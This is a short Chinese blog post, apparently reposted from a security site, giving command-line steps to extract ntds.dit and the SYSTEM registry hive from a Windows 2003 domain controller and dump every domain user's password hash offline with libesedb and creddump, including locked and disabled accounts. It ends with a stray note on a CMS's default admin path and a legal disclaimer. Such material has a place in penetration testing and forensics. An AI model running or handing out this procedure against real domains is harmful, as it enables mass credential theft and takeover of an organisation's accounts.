前言:by Metasploit上次写了一篇文章叫QuarksPwDum导出2003 AD域控所有用户hash的方法,这种方法只能导小型域控(几百用户的)。如果碰到几万甚至几十万用户的域控,用上面的方法就不行了,就会崩溃。那我们该怎么办呢?
正文:
一:
1,首先登陆域控提取ntds.dit,提取方法上篇文章有介绍。
2,然后提取注册表cmd>reg save hklmsystem system.hive
3, 把这两个文件下载到本地,然后放在虚拟机里面,我这里以kali为例演示(例虚拟机位置为/tmp/)
二:
进入kali虚拟机,然后下载文件ntds_dump_hash.zip (下载地址),解压安装。
#unzip ntds_dump_hash.zip #cd libesedb #./configure && make
修复数据库文件
#cd esedbtools #./esedbdumphash -v -t /tmp/output /tmp/ntds.dit #ls -1 /tmp/output.export/
导出数据库hash
#cd ../../creddump/ #chmod +x *.py #./dsuserinfo.py /tmp/output.export/datatable #./dsdump.py/tmp/output.export/datatable -include-locked -include-disabled > /domain_hashes.txt
by Metasploit
转载请注明出处http://www.metasploit.cn/
文章来源于lcx.cc:2003(32/64位)导出AD域控用户hash的终极方法
DodeCMS成创网站内容管理系统由辽宁成创网络科技有限公司基于微软ASP、通用ACCESS数据库开发完成; 访问模式采用动态模式,基本上实现了系统的自定义功能,代码简洁高效,易于修改维护,可扩展性强。 默认后台路径:admin/ …
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论